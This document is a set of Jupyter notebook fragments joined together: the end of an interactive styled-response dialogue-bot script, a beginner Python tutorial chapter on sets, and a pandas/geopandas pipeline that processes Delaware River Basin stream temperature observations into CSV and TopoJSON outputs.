shots_value=mapper["IC"]["shots"][max_seq],
shot_converter=mapper["IC"]["shot_converter"],
file_shot=mapper["IC"]["file_data"]+"valid.json",
name_dataset="IC", with_knowledge=mapper["IC"]["with_knowledge"],
shot_separator=mapper["IC"]["shot_separator"],sample_times=2)[0]
max_number_turns = mapper["IC"]["max_number_turns"]
prompt_sytle = {}
for sty in prefix_dict.keys():
sty_name = sty.replace(" ","-").replace("(","").replace(")","").replace(",","").split("_")[0]
prompt_sytle[sty_name] = prefix_dict[sty]
styles = ", ".join(list(prompt_sytle.keys()))
print(f"The possible styles are \n {styles}")
dialogue = {"dialogue":[],"personalities":""}
while True:
user_utt = input(">>> ")
dialogue["dialogue"].append([user_utt,""])
print("Choose a style from the list!")
style = input(">>> ")
if style not in prompt_sytle.keys():
print("You have to choose a style from the list!")
print("This time a random style is selected!")
style = random.sample(list(prompt_sytle.keys()), 1)[0]
print(f"You got the {style} style!")
dialogue["personalities"] = style
prefix_shots = prompt_sytle[style]
prefix = prefix_shots.get(mapper["IC"]["max_shot"][max_seq])
response = generate_response_interactive(model, tokenizer, shot_converter=mapper["IC"]["shot_converter_inference"],
dialogue=dialogue, prefix=prefix,
device=device, max_number_turns=mapper["IC"]["max_number_turns"],
with_knowledge=mapper["IC"]["with_knowledge"],
meta_type=mapper["IC"]["meta_type"], gen_len=50,
beam=1, max_seq=max_seq, eos_token_id=198,
do_sample=True, multigpu=False, api=api, api_key=api_key)
print(f"FSB ({style}) >>> {response}")
dialogue["dialogue"][-1][1] = response
dialogue["dialogue"] = dialogue["dialogue"][-max_number_turns:]
## USE THIS ONLY WITH LOCAL MODELS ==> ELSE THE API QUOTA RUNS OUT IMMIDIATELY
max_number_turns = mapper["IC"]["max_number_turns"]
prompt_sytle = {}
for sty in prefix_dict.keys():
sty_name = sty.replace(" ","-").replace("(","").replace(")","").replace(",","").split("_")[0]
prompt_sytle[sty_name] = prefix_dict[sty]
styles = ", ".join(list(prompt_sytle.keys()))
dialogue = {"dialogue":[],"personalities":""}
while True:
user_utt = input(">>> ")
dialogue["dialogue"].append([user_utt,""])
items = list(prompt_sytle.keys()) # List of tuples of (key,values)
random.shuffle(items) # shuffle the styles a bit
for id_r, style in enumerate(items):
dialogue["personalities"] = style
prefix_shots = prompt_sytle[style]
prefix = prefix_shots.get(mapper["IC"]["max_shot"][max_seq])
response = generate_response_interactive(model, tokenizer, shot_converter=mapper["IC"]["shot_converter_inference"],
dialogue=dialogue, prefix=prefix,
device=device, max_number_turns=max_number_turns,
with_knowledge=mapper["IC"]["with_knowledge"],
meta_type=mapper["IC"]["meta_type"], gen_len=50,
beam=1, max_seq=max_seq, eos_token_id=198,
do_sample=True, multigpu=False, api=api, api_key=api_key)
print(f"FSB ({style}) >>> {response}")
if id_r == 10: break
dialogue["dialogue"][-1][1] = response
dialogue["dialogue"] = dialogue["dialogue"][-max_number_turns:]
```
| github_jupyter |
# Chapter 7 - Sets
This chapter will introduce a different kind of container: **sets**. Sets are unordered lists with no duplicate entries. You might wonder why we need different types of containers. We will postpone that discussion until chapter 8.
**At the end of this chapter, you will be able to:**
* create a set
* add items to a set
* extract/inspect items in a set
**If you want to learn more about these topics, you might find the following links useful:**
* [Python documentation](https://docs.python.org/3/tutorial/datastructures.html#sets)
* [A tutorial on sets](https://www.learnpython.org/en/Sets)
If you have **questions** about this chapter, please contact us **(cltl.python.course@gmail.com)**.
## 1. How to create a set
It's quite simple to create a set.
```
a_set = {1, 2, 3}
a_set
empty_set = set() # you have to use set() to create an empty set! (we will see why later)
print(empty_set)
```
* Curly brackets surround sets, and commas separate the elements in the set
* A set can be empty (use set() to create it)
* Sets do not allow **duplicates**
* sets are unordered (the order in which you add items is not important)
* A set can **only contain immutable objects** (for now that means only **strings** and **integers** can be added)
* A set can not contain **mutable objects**, hence no lists or sets
Please note that sets do not allow **duplicates**. In the example below, the integer **1** will only be present once in the set.
```
a_set = {1, 2, 1, 1}
print(a_set)
```
Please note that sets are **unordered**. This means that it can occur that if you print a set, it looks different than how you created it
```
a_set = {1, 3, 2}
print(a_set)
```
This also means that you can check if two sets are the same even if you don't know the order in which items were put in:
```
{1, 2, 3} == {2, 3, 1}
```
Please note that sets can **only contain immutable objects**. Hence the following examples will work, since we are adding immutable objects
```
a_set = {1, 'a'}
print(a_set)
```
But the following example will result in an error, since we are trying to create a set with a **mutable object**
```
a_set = {1, []}
```
## 2. How to add items to a set
The most common way of adding an item to a set is by using the **add** method. The **add** method has one positional parameter, namely what you are going to add to the set, and it returns None.
```
a_set = set()
a_set.add(1)
print(a_set)
a_set = set()
a_set = a_set.add(1)
print(a_set)
```
## 3. How to extract/inspect items in a set
When you use sets, you usually want to **compare the elements of different sets**, for instance, to determine how much overlap there is or how many of the items in set1 are not members of set2. Sets can be used to carry out mathematical set operations like **union**, **intersection**, **difference**, and **symmetric difference**. Please take a look at [this website](https://www.programiz.com/python-programming/set) if you prefer a more visual and more complete explanation.
You can ask Python to show you all the set methods by using **dir**. All the methods that do not start with '__' are relevant for you.
```
dir(set)
```
You observe that there are many methods defined for sets! Here we explain the two most common methods. We start with the **union** method.
```
help(set.union)
```
Python shows dots (...) for the parameters of the **union** method. Based on the docstring, we learn that we can provide any number of sets, and Python will return the union of them.
```
set1 = {1, 2, 3, 4, 5}
set2 = {4, 5, 6, 7, 8}
the_union = set1.union(set2)
print(the_union)
set1 = {1, 2, 3, 4, 5}
set2 = {4, 5, 6, 7, 8}
set3 = {5, 6, 7, 8, 9}
the_union = set1.union(set2, set3)
print(the_union)
```
The **intersection** method has works in a similar manner as the **union** method, but returns a new set containing only the intersection of the sets.
```
help(set.intersection)
set1 = {1, 2, 3, 4, 5}
set2 = {4, 5, 6, 7, 8}
the_intersection = set1.intersection(set2)
print(the_intersection)
set1 = {1, 2, 3, 4, 5}
set2 = {4, 5, 6, 7, 8}
set3 = {5, 8, 9, 10}
the_intersection = set1.intersection(set2, set3)
print(the_intersection)
```
Since sets are **unordered**, you can **not** use an index to extract an element from a set.
```
a_set = set()
a_set.add(1)
a_set.add(2)
a_set[0]
```
## 4. Using built-in functions on sets
The same range of **functions that operate on lists** also work with sets. We can easily get some simple calculations done with these functions:
```
nums = {3, 41, 12, 9, 74, 15}
print(len(nums)) # number of items in a set
print(max(nums)) # highest value in a set
print(min(nums)) # lowest value in a set
print(sum(nums)) # sum of all values in a set
```
## 5. An overview of set operations
There are many more operations which we can perform on sets. Here is an overview of some of them.
In order to get used to them, please call the **help** function on each of them (e.g., help(set.union)). This will give you the information about the positional parameters, keyword parameters, and what is returned by the method.
```
set_a = {1, 2, 3}
set_b = {4, 5, 6}
an_element = 4
print(set_a)
#do some operations
set_a.add(an_element) # Add an_element to set_a
print(set_a)
set_a.update(set_b) # Add the elements of set_b to set_a
print(set_a)
set_a.pop() # Remove and return an arbitrary set element. How does this compare to the list method pop?
print(set_a)
set_a.remove(an_element) # Remove an_element from set_a
print(set_a)
```
Before diving into some exercises, you may want to the **dir** built-in function again to see an overview of all set methods:
```
dir(set)
```
## Exercises
**Exercise 1:**
Please create an empty set and use the **add** method to add four items to it: 'a', 'set', 'is', 'born'
**Exercise 2:**
Please use a built-in method to **count** how many items your set has
**Exercise 3:**
How would you **remove** one item from the set?
**Exercise 4:**
Please check which items are in both sets:
```
set_1 = {'just', 'some', 'words'}
set_2 = {'some', 'other', 'words'}
# your code here
```
| github_jupyter |
```
# import packages
import pandas as pd
import geopandas as gpd
import geojson
import numpy as np
import os
from shapely.geometry import Point
```
# Import Data
```
# set location of input data files
input_dir = 'input_data'
```
### Segment polylines
```
# read in segment shapefile (simplified to 4 percent with mapshaper and smoothed in ArcGIS) as geodataframe
segment_gdf = gpd.read_file(os.path.join(input_dir,'shapefiles/Segments_subset_4per_smooth.shp'))
```
### Delaware Bay
```
# read in NHD delaware bay shapefile (simplified to 0.6 percent with mapshaper and smoothed in ArcGIS) as geodataframe
delaware_bay_gdf = gpd.read_file(os.path.join(input_dir,'shapefiles/NHDWaterbody_DelawareBay_pt6per_smooth.shp'))
```
### Reservoirs
```
# read in simplified reservoirs shapefile as geodataframe
reservoirs = gpd.read_file(os.path.join(input_dir,'shapefiles/reservoirs_17per.shp'))
# filter out four reservoirs that are not on model segments
reservoirs = reservoirs[(reservoirs.GRAND_ID != 2212) & (reservoirs.GRAND_ID != 1591) & (reservoirs.GRAND_ID != 1584) & (reservoirs.GRAND_ID != 2242)]
# drop index
reservoirs = reservoirs.reset_index(drop=True)
```
### Station locations
```
# list of unique drb sites (coordinate system = NAD1983 = EPSG 4269)
unique_drb_sites = pd.read_csv(os.path.join(input_dir,'unique_drb_sites.csv'), index_col=None)
```
### Temperature observations
```
obs_temp_df_raw = pd.read_csv(os.path.join(input_dir,'obs_temp_drb.csv'), delimiter=',')
```
### # Observations per year, by source
```
n_obs_annual_source = pd.read_csv(os.path.join(input_dir,'n_obs_per_year_source.csv'), delimiter=',')
```
### Modeled segment outflow
```
seg_outflow = pd.read_csv(os.path.join(input_dir,'seg_outflow.csv'))
```
# Clean and structure data for analysis
### Clean temperature observation data
```
# remove NAs from seg_id_nat column
obs_temp_df_cleaned = obs_temp_df_raw.loc[obs_temp_df_raw['seg_id_nat'].notnull()]
# get # of unique segment ids
obs_temp_seg_id_nat_unique = np.unique(obs_temp_df_cleaned['seg_id_nat'].tolist())
len(obs_temp_seg_id_nat_unique)
# convert date to datetime
obs_temp_df_cleaned['date'] = pd.to_datetime(obs_temp_df_cleaned['date'])
# find single erroneous observation value
obs_temp_df_cleaned.loc[(obs_temp_df_cleaned['date'] == '2019-08-21') & (obs_temp_df_cleaned['seg_id_nat'] == 1764)]
# drop that row from the dataframe
obs_temp_df_cleaned = obs_temp_df_cleaned.drop(labels=307015)
# Set date as index and sort by date
obs_temp_df_cleaned = obs_temp_df_cleaned.set_index(['date'], drop=True)
obs_temp_df_cleaned = obs_temp_df_cleaned.sort_index()
# create new copy of cleaned dataframe
obs_temp_df = obs_temp_df_cleaned.copy()
# convert segment id to integer
obs_temp_df['seg_id_nat'] = obs_temp_df['seg_id_nat'].astype(int)
# create year column based on year index
obs_temp_df['year'] = obs_temp_df.index.year #.astype(int)
# create year-month column
obs_temp_df['year-month'] = obs_temp_df.index.to_period('M')
# create month column
obs_temp_df['month'] = obs_temp_df.index.month
# for each row (i.e. each observation), set observation count to 1
obs_temp_df['obs_count'] = 1
obs_temp_df.head()
# filter observations data to only include observations from 1980-2020
obs_temp_df = obs_temp_df.loc['1980-01-01':'2020-12-31']
obs_temp_df
```
### Generate date list and dataframe for use later to pull segment-specific data
```
# create version of observations dataframe with date (as string) and segment id as indices
obs_temp_daily_count = obs_temp_df.copy()
obs_temp_daily_count.index = obs_temp_daily_count.index.astype(str)
obs_temp_daily_count
# add segment id as second index level (for use later to pull observations for each segment)
obs_temp_daily_count = obs_temp_daily_count.set_index('seg_id_nat', append=True)
obs_temp_daily_count.head()
```
# Process spatial data
### Get list of all segments
```
segment_list = np.unique(segment_gdf['seg_id_nat'].tolist())
segment_list.sort()
```
### Get centroids for stream segments
```
# create copy of dataframe
centroid_gdf = segment_gdf.copy()
# check crs of segment geodataframe
centroid_gdf.crs
# reproject before calculating segment centroids
centroid_gdf = centroid_gdf.to_crs(epsg=6350)
# check crs of segment geodataframe
centroid_gdf.crs
# add column with centroid of each segment
centroid_gdf['centroid'] = centroid_gdf['geometry'].interpolate(0.5, normalized=True)
centroid_gdf.head()
# reassign the geodataframe geometry to be the centroid column
centroid_gdf = centroid_gdf.set_geometry('centroid')
# revert to geographic crs (WGS 1984)
centroid_gdf = centroid_gdf.to_crs(epsg=4326)
# check that centroid coordinates have been reprojected
centroid_gdf.head()
# create column of only centroid latitude
centroid_gdf['seg_centroid_lat'] = centroid_gdf['centroid'].apply(lambda p: p.y)
centroid_gdf.head()
```
### Extract latitudes of segment centroids
```
# drop all columns except seg_id_nat and centroid
segment_latitudes_df = centroid_gdf.drop(columns=['region','model_idx','InLine_FID','SmoLnFlag','geometry', 'centroid'])
# set segment id as index
segment_latitudes_df = segment_latitudes_df.set_index('seg_id_nat')
segment_latitudes_df.head()
```
### Convert dataframe of unique sites in DRB with monitoring data to geodataframe
```
unique_drb_sites.head()
# convert the dataframe to a geodataframe
unique_drb_sites_gdf = gpd.GeoDataFrame(unique_drb_sites, crs="EPSG:4326", geometry=gpd.points_from_xy(unique_drb_sites.longitude, unique_drb_sites.latitude))
unique_drb_sites_gdf.head()
unique_drb_sites_gdf.shape
ax = segment_gdf.plot(figsize=(30,15))
unique_drb_sites_gdf.plot(ax = ax, markersize=2, color = 'red')
```
# Process temperature observations data
### Transform dataframe of # of observations per year per source
```
# load data w/ number of observations per year, by source
n_obs_annual_source.head()
# pivot into wide format
source_annual_count = n_obs_annual_source.pivot(index='year', columns='source', values='n_obs')
source_annual_count.head()
# create a continous date range from 1901-2020, at an annual interval
year_index = pd.date_range('01-01-1960', '01-01-2021', freq='A')
# pull only the year associated with each date
year_index = year_index.year
# reindex the dataframe to fill in missing years
# fill nas with 0s
source_annual_count = source_annual_count.reindex(index=year_index, fill_value = 0)
source_annual_count = source_annual_count.fillna(value = 0)
source_annual_count = source_annual_count.astype(int)
source_annual_count.index.rename('year', inplace=True)
source_annual_count = source_annual_count.rename(columns={'Other':'State or other agency'})
source_annual_count = source_annual_count[['USGS', 'State or other agency']]
source_annual_count
```
### Get segment-specific counts of temperature observations for different time steps
##### count of all observations from 1980-2020 for each segment
```
obs_temp_df.head()
# count of all observations from 1980-2020 for each segment
obs_temp_count = obs_temp_df.groupby(['seg_id_nat']).count()
obs_temp_count = obs_temp_count.drop(columns=['subseg_id', 'mean_temp_c', 'min_temp_c', 'max_temp_c', 'site_id', 'year', 'year-month', 'month'])
obs_temp_count = obs_temp_count.sort_index()
obs_temp_count.index = obs_temp_count.index.astype(int)
obs_temp_count = obs_temp_count.rename(columns={'obs_count':'total_count'})
obs_temp_count
```
##### count of observations in each year (from 1980-2020) for each segment
```
# count of observations in each year, from 1980 - 2020
obs_temp_year_count = obs_temp_df.groupby(['seg_id_nat', 'year']).count()
obs_temp_year_count = obs_temp_year_count.drop(columns=['subseg_id', 'mean_temp_c', 'min_temp_c', 'max_temp_c', 'site_id', 'year-month', 'month'])
```
##### count of all observations in 2019 for each segment
```
# subset 2019 data from all temperature observations
obs_temp_df_2019 = obs_temp_df.loc['2019-01-01':'2019-12-31']
obs_temp_df_2019
# count of all observations in each month of 2019 for each segment
obs_temp_df_2019_months = obs_temp_df_2019.copy()
obs_temp_df_2019_months['month_name'] = obs_temp_df_2019_months.index.strftime('%B')
obs_temp_count_month_2019 = obs_temp_df_2019_months.groupby(['seg_id_nat','month_name']).count()
obs_temp_count_month_2019 = obs_temp_count_month_2019.drop(columns=['subseg_id','mean_temp_c','min_temp_c','max_temp_c','site_id','year','year-month','month'])
obs_temp_mean_month_2019 = obs_temp_df_2019_months.groupby(['seg_id_nat','month_name']).mean()
obs_temp_mean_month_2019 = obs_temp_mean_month_2019.drop(columns=['min_temp_c','max_temp_c','year','month','obs_count'])
obs_temp_mean_month_2019 = obs_temp_mean_month_2019.rename(columns={'mean_temp_c':'mean_t_c'})
obs_temp_month_2019 = obs_temp_count_month_2019.join(obs_temp_mean_month_2019)
obs_temp_month_2019.head()
# count of all observations on each day in 2019 for each segment
obs_temp_count_2019 = obs_temp_df_2019.groupby(['seg_id_nat']).count()
obs_temp_count_2019 = obs_temp_count_2019.drop(columns=['month', 'year', 'subseg_id', 'mean_temp_c', 'min_temp_c', 'max_temp_c', 'site_id', 'year-month'])
obs_temp_count_2019 = obs_temp_count_2019.sort_index()
obs_temp_count_2019.index = obs_temp_count_2019.index.astype(int)
obs_temp_count_2019 = obs_temp_count_2019.rename(columns={'obs_count':'total_count'})
obs_temp_count_2019
```
### get total annual and daily counts of observations
##### annual counts
```
# group observations by year to get total count of observations in each year
obs_annual_count = obs_temp_df.groupby(['year']).count()
obs_annual_count = obs_annual_count.drop(columns=['subseg_id', 'seg_id_nat', 'mean_temp_c', 'min_temp_c', 'max_temp_c', 'site_id', 'year-month', 'month'])
obs_annual_count = obs_annual_count.rename(columns={'obs_count': 'total_annual_count'})
obs_annual_count.head()
```
##### daily counts
```
# get count of observations on each day from 1980-2019
obs_daily_count = obs_temp_df.groupby(['date']).count()
obs_daily_count = obs_daily_count.drop(columns=['subseg_id', 'seg_id_nat', 'mean_temp_c', 'min_temp_c', 'max_temp_c', 'site_id', 'year', 'year-month', 'month'])
obs_daily_count = obs_daily_count.rename(columns={'obs_count': 'total_daily_count'})
obs_daily_count
# get count of observations on each day of 2019
obs_daily_count_2019 = obs_daily_count.loc['2019-01-01':'2019-12-31']
obs_daily_count_2019
```
### Format data for matrices
```
# create copy of observations dataframe
all_observations_df = obs_temp_df.copy()
# set year as string type
all_observations_df['year'] = all_observations_df['year'].astype(str)
all_observations_df
```
##### annual time interval
```
# create a dataframe with the segment ids as the columns
matrix_annual_df = pd.DataFrame(columns=segment_list)
# set a date range with annual timesteps from 1980-2020
model_date_rng = pd.date_range('1980', periods=41, freq='A')
# add a column to the dataframe with the set date range
matrix_annual_df['Date'] = model_date_rng
# convert dates to datetime format
matrix_annual_df['Date'] = pd.to_datetime(matrix_annual_df['Date'])
# set date as index
matrix_annual_df = matrix_annual_df.set_index('Date')
# create a column for year
matrix_annual_df['year'] = matrix_annual_df.index.to_period('A')
# set year as index
matrix_annual_df = matrix_annual_df.set_index('year')
# make index type string
matrix_annual_df.index = matrix_annual_df.index.astype(str)
matrix_annual_df.head()
# stack the dataframe columns to indices
matrix_annual_series = matrix_annual_df.stack(dropna=False)
matrix_annual_series
# convert the stacked series to a dataframe with two indices
matrix_annual_stacked = matrix_annual_series.to_frame()
# rename the second index to segment id
matrix_annual_stacked.index = matrix_annual_stacked.index.rename('seg_id_nat', level=1)
matrix_annual_stacked.head()
# get count of observations for each segment in each year
seg_obs_temp_year_count = all_observations_df.groupby(['year','seg_id_nat']).sum()
seg_obs_temp_year_count = seg_obs_temp_year_count.drop(columns=['mean_temp_c','min_temp_c','max_temp_c','month'])
seg_obs_temp_year_count.head()
# add the count for each segment to the matrix
matrix_annual_obs = matrix_annual_stacked.join(seg_obs_temp_year_count, on=['year','seg_id_nat'])
# drop empty column
matrix_annual_obs = matrix_annual_obs.drop(columns=0)
# replace na values with 0 (for 0 observations)
matrix_annual_obs = matrix_annual_obs.fillna(0, axis=0)
matrix_annual_obs.head()
# add column with total count for each segment (over whole period, from 1980-2020)
matrix_annual_obs = matrix_annual_obs.join(obs_temp_count, on=['seg_id_nat'], how='left')
matrix_annual_obs = matrix_annual_obs.fillna(0)
matrix_annual_obs.head()
# create dataframe of segment latitudes, ordered by latitude
segment_latitudes_reindexed = segment_latitudes_df.sort_values(by='seg_centroid_lat')
# reset the index
segment_latitudes_reindexed = segment_latitudes_reindexed.reset_index()
# set the segment id as the second index
segment_latitudes_reindexed = segment_latitudes_reindexed.set_index('seg_id_nat', append=True)
segment_latitudes_reindexed.head()
# make a column storing the first and second index levels as a tuple
segment_latitudes_reindexed['index_tuple'] = segment_latitudes_reindexed.index
# drop the first level of the index
segment_latitudes_reindexed = segment_latitudes_reindexed.droplevel(level=0)
segment_latitudes_reindexed.head()
# add column with zero values named 'rank'
segment_latitudes_reindexed['rank'] = 0
segment_latitudes_reindexed.head()
# fill the rank column with the first value of the index_tuple (to get rank of segment by latitude)
for segment_id in segment_list:
segment_latitudes_reindexed['rank'][segment_id] = segment_latitudes_reindexed['index_tuple'][segment_id][0]
segment_latitudes_reindexed.head()
# sort the dataframe by the segment id
segment_latitudes_reindexed = segment_latitudes_reindexed.sort_index()
# drop the index tuple column
segment_latitudes_reindexed = segment_latitudes_reindexed.drop(columns=['index_tuple'])
segment_latitudes_reindexed.head()
# join the segment latitudes dataframe to the matrix of segment observations
matrix_annual_obs = matrix_annual_obs.join(segment_latitudes_reindexed, on=['seg_id_nat'], how='left')
matrix_annual_obs.head()
# sort the matrix by rank, so that the segment data is ordered by segment latitude
matrix_annual_obs = matrix_annual_obs.sort_values(by='rank')
# sort the matrix by year, so that data is ordered correctly temporally
matrix_annual_obs = matrix_annual_obs.sort_index(level=0, sort_remaining=False)
matrix_annual_obs.head()
```
##### daily time interval - 2019 only
```
# create an empty dataframe with the segment ids as the columns
matrix_daily_2019_df = pd.DataFrame(columns=segment_list)
# set up a date range with a daily timestep for the year 2019
model_daily_2019_date_rng = pd.date_range('2019-01-01', periods=365, freq='D')
# add a date column to the dataframe based on the date range
matrix_daily_2019_df['date'] = model_daily_2019_date_rng
# convert the date to datetime format
matrix_daily_2019_df['date'] = pd.to_datetime(matrix_daily_2019_df['date'])
# set the date as the index
matrix_daily_2019_df = matrix_daily_2019_df.set_index('date')
matrix_daily_2019_df.head()
# stack the dataframe columns to indices
matrix_daily_2019_series = matrix_daily_2019_df.stack(dropna=False)
matrix_daily_2019_series
# create a dataframe with two index levels from the stacked series
matrix_daily_2019_stacked = matrix_daily_2019_series.to_frame()
# rename the second index level 'seg_id_nat'
matrix_daily_2019_stacked.index = matrix_daily_2019_stacked.index.rename('seg_id_nat', level=1)
matrix_daily_2019_stacked.head()
# get count of observations for each segment on each day
seg_obs_temp_daily_count = all_observations_df.groupby(['date','seg_id_nat']).sum()
seg_obs_temp_daily_count = seg_obs_temp_daily_count.drop(columns=['mean_temp_c','min_temp_c','max_temp_c','month'])
seg_obs_temp_daily_count.head()
# join the daily counts to the observation matrix
matrix_daily_2019_obs = matrix_daily_2019_stacked.join(seg_obs_temp_daily_count, on=['date','seg_id_nat'])
# drop empty column
matrix_daily_2019_obs = matrix_daily_2019_obs.drop(columns=0)
# replace na values with 0s
matrix_daily_2019_obs = matrix_daily_2019_obs.fillna(0, axis=0)
matrix_daily_2019_obs.head()
# add a column with the total count for each segment (in 2019)
matrix_daily_2019_obs = matrix_daily_2019_obs.join(obs_temp_count_2019, on=['seg_id_nat'], how='left')
matrix_daily_2019_obs = matrix_daily_2019_obs.fillna(0)
matrix_daily_2019_obs.head()
# pull actual temperature observations
obs_temp_daily_count_temps = all_observations_df.copy()
obs_temp_daily_count_temps = obs_temp_daily_count_temps.set_index('seg_id_nat', append=True)
obs_temp_daily_count_temps = obs_temp_daily_count_temps.drop(columns=['subseg_id','min_temp_c','max_temp_c','site_id','year','year-month','month','obs_count'])
obs_temp_daily_count_temps.head()
# add in temperature for each date for each segment
matrix_daily_2019_obs = matrix_daily_2019_obs.join(obs_temp_daily_count_temps, on=['date','seg_id_nat'])
matrix_daily_2019_obs.head()
# add latitude and latitude-based rank of each segment
matrix_daily_2019_obs = matrix_daily_2019_obs.join(segment_latitudes_reindexed, on=['seg_id_nat'], how='left')
matrix_daily_2019_obs.head()
# sort dataframe by rank
matrix_daily_2019_obs = matrix_daily_2019_obs.sort_values(by='rank')
# sort dataframe by date
matrix_daily_2019_obs = matrix_daily_2019_obs.sort_index(level=0, sort_remaining=False)
matrix_daily_2019_obs.head()
```
# Processed modeled segment outflow data
```
seg_outflow.head()
# convert date to datetime format
seg_outflow['date'] = pd.to_datetime(seg_outflow['date'])
# set date as index
seg_outflow = seg_outflow.set_index(['date'], drop=True)
# add year column
seg_outflow['year'] = seg_outflow.index.year
# subset the data to a 30yr period
seg_outflow_81_09 = seg_outflow.loc[(seg_outflow['year'] > 1980) & (seg_outflow['year'] < 2010)]
# compute average modeled outflow for each segment in each year
seg_avg_outflow_81_09 = seg_outflow_81_09.groupby(['year']).mean()
seg_avg_outflow_81_09.head()
# transform the dataframe, so that the segment id is the index
segindex_avg_outflow_81_09 = seg_avg_outflow_81_09.T
# add column with segment id
segindex_avg_outflow_81_09['seg_id_nat'] = segindex_avg_outflow_81_09.index
# convert segment id to integer type
segindex_avg_outflow_81_09['seg_id_nat'] = segindex_avg_outflow_81_09['seg_id_nat'].astype(int)
# add a column with the overall average annual modeled outflow for each segment
segindex_avg_outflow_81_09['avg_ann_flow'] = segindex_avg_outflow_81_09.mean(axis=1)
segindex_avg_outflow_81_09.head()
# subset data to just segment id and average annual modeled segment outflow
segment_maflow = segindex_avg_outflow_81_09[['seg_id_nat','avg_ann_flow']]
segment_maflow = segment_maflow.set_index('seg_id_nat')
segment_maflow.head()
```
# Export data
```
# set location for intermediate output data files
intermediate_output_dir = 'intermediate_output'
# create intermediate output folder if it doesn't already exist
if not os.path.exists(intermediate_output_dir):
os.mkdir(intermediate_output_dir)
# set location for final output data files
output_dir = '../public/data'
```
### Export spatial data that does not require processing
##### Generate reservoir geojson
```
# export geodataframe as a geojson
reservoirs.to_file(os.path.join(intermediate_output_dir,'reservoirs.json'), driver='GeoJSON')
```
##### Generate delaware bay geojson
```
delaware_bay_gdf.to_file(os.path.join(intermediate_output_dir,'NHDWaterbody_DelawareBay_pt6per_smooth.json'), driver='GeoJSON')
```
### Export processed datasets
##### locations of unique monitoring sites with temperature observations
```
# convert geodataframe to geojson
unique_drb_sites_gdf.to_file(os.path.join(intermediate_output_dir,'unique_drb_sites.json'), driver='GeoJSON')
```
##### count of observations at sites associated with each agency in each year
```
source_annual_count.to_csv(os.path.join(output_dir,'source_annual_count.csv'), index_label=None)
```
##### temporal counts of temperature observations (not segment-specific)
```
# export total counts for each year from 1980-2019
obs_annual_count.to_csv(os.path.join(output_dir,'obs_annual_count.csv'), index_label=None)
# export total counts for each day of 2019
obs_daily_count_2019.to_csv(os.path.join(output_dir,'obs_daily_count_2019.csv'), index_label=None)
```
##### matrix of segment temperature observations on annual timestep
```
matrix_annual_obs.to_csv(os.path.join(output_dir,'matrix_annual_obs.csv'), index_label=None)
```
##### matrix of segment temperature observations on daily timestep (2019 only)
```
matrix_daily_2019_obs.to_csv(os.path.join(output_dir,'matrix_daily_2019_obs.csv'), index_label=None)
```
##### mean annual modeled segment outflow for each model segment
```
# segment_maflow.to_csv('TP_output_data/segment_maflow.csv', index_label='seg_id_nat')
segment_maflow.to_csv(os.path.join(output_dir,'segment_maflow.csv'), index_label=None)
```
### Construct and export segment geojson
##### prep data
```
# convert segment geodataframe to dictionary format
segment_polylines = segment_gdf.to_dict(orient='records')
len(segment_polylines)
# get list of years in record (1980-2014)
year_list = np.unique(obs_temp_df['year'].tolist())
year_list.sort()
month_list = ['January','February','March','April','May','June','July','August','September','October','November','December']
```
##### construct json
```
# format designed to match desired structure of segmentDict
# create empty array to store dictionaries
segment_array = []
# iterate through the list of segments to...
i = 0
while i < len(segment_polylines):
# create an empty segment dictionary
segment_dict = {}
# set type to Feature
segment_dict["type"] = "Feature"
# set segment id field
segment_id = segment_polylines[i]['seg_id_nat']
segment_dict["seg_id_nat"] = str(segment_id)
# add properties dictionary
segment_dict["properties"] = {}
# Add segment id as outer key
segment_dict["properties"]["seg_id_nat"] = str(segment_id)
# Add segment id as outer key
segment_dict["properties"][str(segment_id)] = {}
# add average annual flow
segment_dict["properties"][str(segment_id)]['avg_ann_flow'] = str(segment_maflow['avg_ann_flow'][segment_id])
# Add total count of observations in each segment
try:
segment_dict["properties"][str(segment_id)]["total_count"] = str(obs_temp_count['total_count'][segment_id])
except:
segment_dict["properties"][str(segment_id)]["total_count"] = '0'
# create dictionary to store count for each year on record
segment_dict["properties"][str(segment_id)]["year_count"] = {}
# iterate through years in list of years to...
for year in year_list:
# add the count of observations for each segment in that year
try:
segment_dict["properties"][str(segment_id)]["year_count"][str(year)] = str(obs_temp_year_count['obs_count'][segment_id][year])
except:
segment_dict["properties"][str(segment_id)]["year_count"][str(year)] = '0'
# add dictionary to store monthly data from 2019 for each segment
segment_dict["properties"][str(segment_id)]["data_2019_monthly"] = {}
for month in month_list:
try:
obs_temp_month_2019['obs_count'][segment_id][month]
segment_dict["properties"][str(segment_id)]["data_2019_monthly"][month] = {}
segment_dict["properties"][str(segment_id)]["data_2019_monthly"][month]["month_count"] = str(obs_temp_month_2019['obs_count'][segment_id][month])
segment_dict["properties"][str(segment_id)]["data_2019_monthly"][month]["month_avg_temp"] = str(obs_temp_month_2019['mean_t_c'][segment_id][month])
except:
continue
# add geometry based on segment geometry
segment_dict["geometry"] = segment_polylines[i]["geometry"]
# append the segment dictionary to the empty segment array
segment_array.append(segment_dict)
# print statement indicating progress
print("added segment", str(i+1), "of", len(segment_polylines))
# increase counter for loop
i += 1
# create empty feature collection dictionary
segment_feature_collection = {}
segment_feature_collection["type"] = "FeatureCollection"
# set content of segment array as list of features within feature collection
segment_feature_collection["features"] = segment_array
# convert segment feature collection to json format
segment_geojson = geojson.dumps(segment_feature_collection)
# export formatted segment geojson
with open(os.path.join(intermediate_output_dir,'segment_data.json'), 'w', encoding='utf-8') as json_file:
json_file.write(segment_geojson)
```
# Convert exported geojsons to topojsons
##### Requires installation of mapshaper: https://github.com/mbloch/mapshaper
```
# get documentation
! mapshaper -h
# convert reservoir json in intermediate_output folder to topojson w/ reduced precision and save in topojson subfolder of public data folder
! mapshaper -i intermediate_output/reservoirs.json -o ../public/data/topojson/reservoirs.json format=topojson precision=0.001
# convert unique_drb_sites json in intermediate_output folder to topojson w/ reduced precision and save in topojson subfolder of public data folder
! mapshaper -i intermediate_output/unique_drb_sites.json -o ../public/data/topojson/unique_drb_sites.json format=topojson precision=0.001
# convert segment_geojson json in intermediate_output folder to topojson w/ reduced precision and save in topojson subfolder of public data folder
! mapshaper -i intermediate_output/segment_data.json -o ../public/data/topojson/segment_data.json format=topojson precision=0.0001
# convert NHDWaterbody_DelawareBay_pt6per_smooth.json in intermediate_output folder to topojson w/ reduced precision and save in topojson subfolder of public data folder
! mapshaper -i intermediate_output/NHDWaterbody_DelawareBay_pt6per_smooth.json -o ../public/data/topojson/DelawareBay.json format=topojson precision=0.001
```
| github_jupyter |
ESTIMATED TOTAL MEMORY USAGE: 2700 MB (but peaks will hit ~20 GB)
```
